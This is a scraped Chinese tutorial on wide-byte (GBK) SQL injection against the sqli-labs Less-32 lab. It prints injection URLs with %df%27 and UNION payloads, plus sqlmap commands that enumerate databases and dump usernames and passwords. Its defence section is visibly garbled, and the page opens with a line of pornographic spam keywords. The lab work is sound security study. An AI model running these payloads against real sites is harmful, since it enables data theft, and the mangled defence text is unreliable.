国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

滲透測試-SQL注入之寬字節(jié)注入

這篇具有很好參考價值的文章主要介紹了滲透測試-SQL注入之寬字節(jié)注入。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

SQL注入之寬字節(jié)注入

前言

一、什么是寬字節(jié)注入

寬字節(jié)是相對于ascII這樣單字節(jié)而言的;像 GB2312、GBK、GB18030、BIG5、Shift_JIS 等這些都是常說的寬字節(jié),實際上只有兩字節(jié)。GBK 是一種多字符的編碼,通常來說,一個 gbk 編碼漢字,占用2個字節(jié)。一個 utf-8 編碼的漢字,占用3個字節(jié)。

轉義函數(shù):為了過濾用戶輸入的一些數(shù)據(jù),對特殊的字符加上反斜杠“\”進行轉義;

寬字節(jié)注入指的是 mysql 數(shù)據(jù)庫在使用寬字節(jié)(GBK)編碼時,會認為兩個字符是一個漢字(前一個ascii碼要大于128(比如%df),才到漢字的范圍),而且當我們輸入單引號時,mysql會調用轉義函數(shù),將單引號變?yōu)椤?,其中\(zhòng)的十六進制是%5c,mysql的GBK編碼,會認為%df%5c是一個寬字節(jié),也就是’運’,從而使單引號閉合(逃逸),進行注入攻擊。

二、寬字節(jié)注入獲取數(shù)據(jù)庫信息

1.寬字節(jié)注入方法

滲透測試-SQL注入之寬字節(jié)注入
寬字節(jié)注入原理
程序員防止注入點,在其后面加入\進行轉義
利用在其后面注入點發(fā)現(xiàn)沒有報錯
http://192.168.222.4/sqli-labs/Less-32/?id=2%df%27

注入?id=1%df’ 出現(xiàn)報錯,存在注入
http://192.168.222.4/sqli-labs/Less-32/?id=1’(不可以注入)
http://192.168.222.4/sqli-labs/Less-32/?id=1%df’
http://192.168.222.4/sqli-labs/Less-32/?id=1%df%27
MySQL在使用GBK編碼時,兩個字符組合,認為是一個漢字
%df’->%df’-> %df%5c%27(%df%5c是一個漢字)->(漢字)‘->id=(漢字)’ and (可以注入)

(1)用sqli-labs靶場進行演示,這里l利用32關進行練習
首先我們嘗試進行注入在后面加’
http://192.168.222.4/sqli-labs/Less-32/?id=1’
滲透測試-SQL注入之寬字節(jié)注入
發(fā)現(xiàn)沒有報錯,我們可以去看看源代碼是怎么寫的
滲透測試-SQL注入之寬字節(jié)注入
滲透測試-SQL注入之寬字節(jié)注入
發(fā)現(xiàn)注入的’ 被\轉義了,無法進行注入
而且發(fā)現(xiàn)代碼中用的是gbk編碼,說明存在寬字節(jié)注入
mysql_query(“SET NAMES gbk”);

然后我們就可以進行寬字節(jié)注入,后面叫上%df’試試
http://192.168.222.4/sqli-labs/Less-32/?id=1%df’
滲透測試-SQL注入之寬字節(jié)注入
發(fā)現(xiàn)報錯,所以肯定存在寬字節(jié)注入,然后查詢有多少列
滲透測試-SQL注入之寬字節(jié)注入
滲透測試-SQL注入之寬字節(jié)注入
發(fā)現(xiàn)存在3列,接下來嘗試注入查找用戶信息
http://192.168.222.4/sqli-labs/Less-32/?id=%df’ union select 1,(select user()),3–+
滲透測試-SQL注入之寬字節(jié)注入
注入成功,查看當前數(shù)據(jù)庫的表
http://192.168.222.4/sqli-labs/Less-32/?id=%df’ union select 1,(select table_name from information_schema.tables where table_schema=database() limit 3,1),3–+
滲透測試-SQL注入之寬字節(jié)注入
用戶信息應該在users表中,接下來繼續(xù)注入查看表中的信息,這里利用sqlmap進行注入查詢,會比較方便
(2)打開sqlmap,輸入
sqlmap -u “http://192.168.222.4/sqli-labs/Less-32/?id=1”
滲透測試-SQL注入之寬字節(jié)注入
這里會顯示id沒有注入,沒事,進行下一步寬字節(jié)注入
sqlmap -u “http://192.168.222.4/sqli-labs/Less-32/?id=1%df”
滲透測試-SQL注入之寬字節(jié)注入
沒有報錯,接下來查當前用戶
sqlmap.py -u “http://192.168.222.4/sqli-labs/Less-32/?id=1%df” --current-user
滲透測試-SQL注入之寬字節(jié)注入
滲透測試-SQL注入之寬字節(jié)注入
查用戶成功,接下來查庫
python sqlmap.py -u “http://192.168.222.4/sqli-labs/Less-32/?id=1%df” --current-db(查數(shù)據(jù)庫)
滲透測試-SQL注入之寬字節(jié)注入
sqlmap -u “http://192.168.222.4/sqli-labs/Less-32/?id=1%df” -D security --tables(當前數(shù)據(jù)庫有哪些表)
滲透測試-SQL注入之寬字節(jié)注入
(當前表中有哪些字段)
sqlmap -u “http://192.168.222.4/sqli-labs/Less-32/?id=1%df” -D security -T users --column
滲透測試-SQL注入之寬字節(jié)注入
(當前表中有哪些數(shù)據(jù))
sqlmap -u “http://192.168.222.4/sqli-labs/Less-32/?id=1%df” -D security -T users -C username,password --dump(使用dump來獲取內容)
滲透測試-SQL注入之寬字節(jié)注入

2.寬字節(jié)注入防御方法

(1)使用utf-8,避免寬字節(jié)注入;
ps: 不僅在gbk,韓文,日文等等都是快字節(jié)注入漏洞

2.mysql_real_escape_string,mysql_set_charset('gbk, c o n n ′ ) ; 3. 可以設置參數(shù), c h a r a c t e r s e t c l i e n t = b i n a r y 只需在該語句中插入 conn'); 3.可以設置參數(shù),character_set_client=binary 只需在該語句中插入 conn);3.可以設置參數(shù),characters?etc?lient=binary只需在該語句中插入result=mysql_query($sql)即可
r e s u l t = m y s q l q u e r y ( " c h a r a c t e r s e t c l i e n t = b i n a r y " , result=mysql_query("character_set_client=binary", result=mysqlq?uery("characters?etc?lient=binary",sql);//就不會出現(xiàn)寬字節(jié)注入了

(2)這里總結一下sqlmap寬字節(jié)注入的使用語句

sqlmap -u “http://192.168.222.4/sqli-labs/Less-32/?id=1”
sqlmap -u “http://192.168.222.4/sqli-labs/Less-32/?id=1%df”
python sqlmap.py -u “http://192.168.222.4/sqli-labs/Less-32/?id=1%df” --current-user
python sqlmap.py -u “http://192.168.222.4/sqli-labs/Less-32/?id=1%df” --current-db(查數(shù)據(jù)庫)
sqlmap -u “http://192.168.222.4/sqli-labs/Less-32/?id=1%df” -D security --tables(當前數(shù)據(jù)庫有哪些表)

(當前表中有哪些字段)
sqlmap -u “http://192.168.222.4/sqli-labs/Less-32/?id=1%df” -D security -T users --column

(當前表中有哪些數(shù)據(jù))
sqlmap -u “http://192.168.222.4/sqli-labs/Less-32/?id=1%df” -D security -T users -C username,password --dump(使用dump來獲取內容)

總結

本次實驗是對SQL注入的寬字節(jié)注入進行靶場練習,了解了寬字節(jié)注入的原理和注入方法,學會了對代碼的審計,判斷注入的方式,從而獲取到用戶的信息。文章來源地址http://www.zghlxwxcb.cn/news/detail-403531.html

到了這里,關于滲透測試-SQL注入之寬字節(jié)注入的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!

本文來自互聯(lián)網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉載,請注明出處: 如若內容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • web滲透之sql注入

    web滲透之sql注入

    博主姓名:擺爛陽 博主主頁面鏈接:傳送門 新人入圈,希望博主的內容可以給大家?guī)韼椭?,有任何問題可以私信本人 擺爛陽從不擺爛滴 所謂SQL注入,就是通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務器執(zhí)行惡意的SQL命令,比如先

    2023年04月08日
    瀏覽(15)
  • sqlmap 是一個自動化的 sql 注入滲透工具

    一.介紹 sqlmap 是一個自動化的 sql 注入滲透工具,指紋檢測、注入方式、注入成功后的取數(shù)據(jù)等等都是自動化的,sqlmap 還提供了很多腳本.但在實踐測試的時候基本用不上.用于檢測和利用 Web 應用程序中的 SQL 注入漏洞。它自動化了識別和利用 SQL 注入漏洞的過程,并可用于執(zhí)

    2024年01月23日
    瀏覽(19)
  • 安全測試-SQL注入

    SQL注入是針對一種數(shù)據(jù)庫而言的,而不是針對網頁語言。在任何使用了數(shù)據(jù)庫查詢環(huán)境下都可能存在。常見的數(shù)據(jù)庫包括:MySQL、Oracle、Db2等。針對不同的數(shù)據(jù)庫系統(tǒng)使用的一些函數(shù)會有所不同,不過從測試是否存在SQL注入的角度考慮,只需要進行幾個最基本的判斷語句就可

    2024年02月08日
    瀏覽(19)
  • SQL注入測試-業(yè)務安全測試實操(10)

    測試原理和方法 SQL注入就是通過把SQL命令插入Web表單提交或輸入域名頁面請求的查詢字符串最終達到欺騙服務器執(zhí)行惡意的SOL命令的目的。具體來說,它是利用現(xiàn)有應用程序,將(惡意)SOL命令注入后臺數(shù)據(jù)庫引擎執(zhí)行的能力,它可以通過在Web表單中輸入 (惡意)SOL 語句獲取一個

    2024年02月09日
    瀏覽(16)
  • Web安全:SQL注入漏洞測試.

    Web安全:SQL注入漏洞測試.

    SQL注入就是 有些 惡意用戶在提交查詢請求的過程中 將SQL語句插入到請求內容 中,同時程序的本身對用戶輸入的內容過于相信, 沒有對用戶插入的SQL語句進行任何的過濾 ,從而 直接被SQL語句直接被服務端執(zhí)行 ,導致數(shù)據(jù)庫的原有信息泄露,篡改,甚至被刪除等風險。 SQL注

    2024年02月05日
    瀏覽(24)
  • Web安全:SQL注入漏洞測試(防止 黑客利用此漏洞.)

    Web安全:SQL注入漏洞測試(防止 黑客利用此漏洞.)

    SQL注入就是 有些 惡意用戶在提交查詢請求的過程中 將SQL語句插入到請求內容 中,同時程序的本身對用戶輸入的內容過于相信, 沒有對用戶插入的SQL語句進行任何的過濾 ,從而 直接被SQL語句直接被服務端執(zhí)行 ,導致數(shù)據(jù)庫的原有信息泄露,篡改,甚至被刪除等風險。 SQL注

    2024年02月13日
    瀏覽(22)
  • Web安全 SQL注入漏洞測試.(可以 防止惡意用戶利用漏洞)

    Web安全 SQL注入漏洞測試.(可以 防止惡意用戶利用漏洞)

    SQL注入就是 有些 惡意用戶在提交查詢請求的過程中 將SQL語句插入到請求內容 中,同時程序的本身對用戶輸入的內容過于相信, 沒有對用戶插入的SQL語句進行任何的過濾 ,從而 直接被SQL語句直接被服務端執(zhí)行 ,導致數(shù)據(jù)庫的原有信息泄露,篡改,甚至被刪除等風險。 SQL注

    2023年04月20日
    瀏覽(25)
  • 使用Burp Suite和Python進行自動化漏洞挖掘—SQL測試注入插件

    使用Burp Suite和Python進行自動化漏洞挖掘—SQL測試注入插件

    每次測注入都是用burp的Intruder模塊,很不方便就是批量跑批量測哪些沒有過濾 懶人鵝上線,準備搞一個sql測試的插件 本篇文章代碼量大,基礎可以去看上一篇 測試sql基本注入的載荷,在可能有sql注入的地方發(fā)送測試包,目前只測試url中的,并可以根據(jù)錯誤回顯判斷出數(shù)據(jù)庫

    2024年02月09日
    瀏覽(26)
  • 寬字節(jié)注入

    寬字節(jié)注入

    目錄 1、魔術引號 什么是魔術引號? 如何開啟魔術引號? 這是低版本做法:magic_quotes_gpc 這是高版本做法:addslashes() 如何繞過魔術引號? (一)找不需要閉合的點 (二)仔細查看作用域 (三)寬字節(jié)注入 2、寬字節(jié)注入例題講解 3、如何用Sqlmap跑寬字節(jié)注入? ?Sqlmap常見命

    2023年04月11日
    瀏覽(12)
  • 2.12 PE結構:實現(xiàn)PE字節(jié)注入

    2.12 PE結構:實現(xiàn)PE字節(jié)注入

    本章筆者將介紹一種通過Metasploit生成ShellCode并將其注入到特定PE文件內的Shell注入技術。該技術能夠劫持原始PE文件的入口地址,在PE程序運行之前執(zhí)行ShellCode反彈,執(zhí)行后掛入后臺并繼續(xù)運行原始程序,實現(xiàn)了一種隱蔽的Shell訪問。而我把這種技術叫做字節(jié)注入反彈。 字節(jié)注

    2024年02月09日
    瀏覽(17)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包